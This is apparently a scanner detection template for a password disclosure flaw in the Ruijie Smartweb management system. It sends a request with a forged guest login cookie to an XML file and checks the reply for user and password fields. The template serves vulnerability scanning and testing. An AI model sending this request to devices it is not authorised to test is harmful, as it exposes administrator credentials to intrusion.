id: ruijie-smartweb-disclosure

info:
  name: Ruijie Smartweb Management System Password Information Disclosure
  author: pikpikcu
  severity: medium
  reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
  tags: ruijie,disclosure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/web/xml/webuser-auth.xml"
    headers:
      Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<userauth>"
          - "<password>"
        part: body

      - type: status
        status:
          - 200
